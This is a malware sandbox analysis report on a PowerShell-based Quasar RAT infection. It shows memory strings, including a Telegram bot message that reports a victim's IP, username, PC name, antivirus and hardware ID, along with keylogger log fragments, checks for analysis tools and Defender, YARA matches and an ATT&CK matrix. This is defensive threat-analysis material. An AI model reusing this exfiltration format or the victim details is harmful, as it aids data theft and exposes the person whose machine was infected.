                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8063B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2655000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":13,"from":{"id":7813041927,"is_bot":true,"first_name":"Btc-CHAN","username":"btchanisaRobot"},"chat":{"id":-4630316859,"title":"Dex Notifications","type":"group","all_members_are_administrators":true},"date":1739291559,"photo":[{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANzAAM2BA","file_unique_id":"AQADFMUxG90ZWFF4","file_size":1105,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANtAAM2BA","file_unique_id":"AQADFMUxG90ZWFFy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN4AAM2BA","file_unique_id":"AQADFMUxG90ZWFF9","file_size":56772,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN5AAM2BA","file_unique_id":"AQADFMUxG90ZWFF-","file_size":119763,"width":1280,"height":1024}],"caption":"\u2728 New Hit \ud83d\udccd IP: 8.46.123.189\n\n\ud83d\udc49 User Name: user\n\ud83d\udc49 PC Name: 783875\n\ud83c\udf0d Country: \ud83c\uddfa\ud83c\uddf8United States (US)\n\u23f1\ufe0f Current Time: 2/11/2025 11:36:35 AM\n\n\ud83d\udee1 Antivirus: Windows Defender\n\ud83c\udffe CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 2000 MHz\n\ud83d\udda5 RAM: 4095 MB\n\u2699\ufe0f HWID: 88AE2742-2B8C-0221-A586-225B8451ACF0\n\ud83c\udfae Active Window Title: Program Manager\n\ud83d\udd53 Uptime: 0 days, 1 hours, 9 minutes","caption_entities":[{"offset":2,"length":7,"type":"bold"},{"offset":17,"length":12,"type":"url"}]}}`
                      Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on Tuesday, 11 February 2025 16:38 UTC<br><br><style>.h { color: f76707; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class="h">[Win + R]</p>@
                      Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [<p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class="h">[Win + R]</p>
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE2655000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":13,"from":{"id":7813041927,"is_bot":true,"first_name":"Btc-CHAN","username":"btchanisaRobot"},"chat":{"id":-4630316859,"title":"Dex Notifications","type":"group","all_members_are_administrators":true},"date":1739291559,"photo":[{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANzAAM2BA","file_unique_id":"AQADFMUxG90ZWFF4","file_size":1105,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANtAAM2BA","file_unique_id":"AQADFMUxG90ZWFFy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN4AAM2BA","file_unique_id":"AQADFMUxG90ZWFF9","file_size":56772,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN5AAM2BA","file_unique_id":"AQADFMUxG90ZWFF-","file_size":119763,"width":1280,"height":1024}],"caption":"\u2728 New Hit \ud83d\udccd IP: 8.46.123.189\n\n\ud83d\udc49 User Name: user\n\ud83d\udc49 PC Name: 783875\n\ud83c\udf0d Country: \ud83c\uddfa\ud83c\uddf8United States (US)\n\u23f1\ufe0f Current Time: 2/11/2025 11:36:35 AM\n\n\ud83d\udee1 Antivirus: Windows Defender\n\ud83c\udffe CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 2000 MHz\n\ud83d\udda5 RAM: 4095 MB\n\u2699\ufe0f HWID: 88AE2742-2B8C-0221-A586-225B8451ACF0\n\ud83c\udfae Active Window Title: Program Manager\n\ud83d\udd53 Uptime: 0 days, 1 hours, 9 minutes","caption_entities":[{"offset":2,"length":7,"type":"bold"},{"offset":17,"length":12,"type":"url"}]}}
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE2817000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":13,"from":{"id":7813041927,"is_bot":true,"first_name":"Btc-CHAN","username":"btchanisaRobot"},"chat":{"id":-4630316859,"title":"Dex Notifications","type":"group","all_members_are_administrators":true},"date":1739291559,"photo":[{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANzAAM2BA","file_unique_id":"AQADFMUxG90ZWFF4","file_size":1105,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANtAAM2BA","file_unique_id":"AQADFMUxG90ZWFFy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN4AAM2BA","file_unique_id":"AQADFMUxG90ZWFF9","file_size":56772,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN5AAM2BA","file_unique_id":"AQADFMUxG90ZWFF-","file_size":119763,"width":1280,"height":1024}],"caption":"\u2728 New Hit \ud83d\udccd IP: 8.46.123.189\n\n\ud83d\udc49 User Name: user\n\ud83d\udc49 PC Name: 783875\n\ud83c\udf0d Country: \ud83c\uddfa\ud83c\uddf8United States (US)\n\u23f1\ufe0f Current Time: 2/11/2025 11:36:35 AM\n\n\ud83d\udee1 Antivirus: Windows Defender\n\ud83c\udffe CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 2000 MHz\n\ud83d\udda5 RAM: 4095 MB\n\u2699\ufe0f HWID: 88AE2742-2B8C-0221-A586-225B8451ACF0\n\ud83c\udfae Active Window Title: Program Manager\n\ud83d\udd53 Uptime: 0 days, 1 hours, 9 minutes","caption_entities":[{"offset":2,"length":7,"type":"bold"},{"offset":17,"length":12,"type":"url"}]}}`U
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE263F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":13,"from":{"id":7813041927,"is_bot":true,"first_name":"Btc-CHAN","username":"btchanisaRobot"},"chat":{"id":-4630316859,"title":"Dex Notifications","type":"group","all_members_are_administrators":true},"date":1739291559,"photo":[{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANzAAM2BA","file_unique_id":"AQADFMUxG90ZWFF4","file_size":1105,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAANtAAM2BA","file_unique_id":"AQADFMUxG90ZWFFy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN4AAM2BA","file_unique_id":"AQADFMUxG90ZWFF9","file_size":56772,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAMNZ6t7p_cLMV-BAhO59WqQXEuzjSIAAhTFMRvdGVhRYMhAHl6gmoYBAAMCAAN5AAM2BA","file_unique_id":"AQADFMUxG90ZWFF-","file_size":119763,"width":1280,"height":1024}],"caption":"\u2728 New Hit \ud83d\udccd IP: 8.46.123.189\n\n\ud83d\udc49 User Name: user\n\ud83d\udc49 PC Name: 783875\n\ud83c\udf0d Country: \ud83c\uddfa\ud83c\uddf8United States (US)\n\u23f1\ufe0f Current Time: 2/11/2025 11:36:35 AM\n\n\ud83d\udee1 Antivirus: Windows Defender\n\ud83c\udffe CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, 2000 MHz\n\ud83d\udda5 RAM: 4095 MB\n\u2699\ufe0f HWID: 88AE2742-2B8C-0221-A586-225B8451ACF0\n\ud83c\udfae Active Window Title: Program Manager\n\ud83d\udd53 Uptime: 0 days, 1 hours, 9 minutes","caption_entities":[{"offset":2,"length":7,"type":"bold"},{"offset":17,"length":12,"type":"url"}]}}x
                      Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <style>.h { color: f76707; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class=
                      Source: powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: A<p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br>
                      Source: powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                      Source: powershell.exe, 00000008.00000002.2591788897.0000022549708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on Tuesday, 11 February 2025 16:38 UTC<br><br><style>.h { color: f76707; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 16:38 UTC</b>]</p><br><p class="h">[Win + R]</p>
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Quasar RAT
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Quasar RAT
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information221
                      Scripting                      		Valid Accounts231
                      Windows Management Instrumentation                      		221
                      Scripting                      		1
                      DLL Side-Loading                      		2
                      Obfuscated Files or Information                      		11
                      Input Capture                      		1
                      File and Directory Discovery                      		Remote Services1
                      Archive Collected Data                      		1
